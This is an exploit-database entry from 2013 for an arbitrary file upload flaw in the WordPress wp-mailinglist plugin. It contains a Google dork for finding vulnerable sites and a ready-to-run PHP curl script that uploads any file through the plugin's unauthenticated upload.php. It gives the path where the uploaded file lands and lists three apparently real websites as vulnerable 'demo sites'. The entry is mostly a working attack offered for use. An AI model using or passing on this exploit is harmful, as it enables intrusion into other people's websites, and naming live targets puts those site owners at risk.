id: 21409
date: 10/24/2013
title: Wordpress plugins wp-mailinglist Arbitrary File Upload
author: indexphp
cves: 

#######################################################
# Exploit Title:Wordpress plugins wp-mailinglist Arbitrary File Upload
# Google Dork: "inurl:/wp-content/plugins/wp-mailinglist/"
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
#######################################################
#exploit

<?php

$uf="your_file.txt";
$c = curl_init("http://target.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uf",
'folder'=>'/'));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($c);
curl_close($c);

print "$postResult";
?>


File path http://target.com/wp-content/uploads/wp-mailinglist/uploadify/random_name.txt

Demo sites
http://www.freresdeshommes.org/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.whitelodge.com.sg//wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.prairieswine.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php

#  0day.today [2023-03-25]  #